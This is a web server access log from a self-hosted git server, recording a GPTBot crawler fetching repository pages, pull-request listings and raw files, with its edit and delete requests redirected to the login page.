git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 13314] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" +[17/Feb/2026:17:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11016] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" +[17/Feb/2026:17:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" +[17/Feb/2026:17:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:28:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md?display=source" [Client 74.7.227.38] [Length 13628] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" +[17/Feb/2026:17:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12245] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 10756] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject" [Client 74.7.227.38] [Length 9810] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" +[17/Feb/2026:17:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11086] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 11757] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" +[17/Feb/2026:17:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode" +[17/Feb/2026:17:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12007] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode" +[17/Feb/2026:17:28:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:28:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 15544] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:28:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:28:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:28:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 9814] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 11096] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 459] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:28:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 21087] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 9846] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11282] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 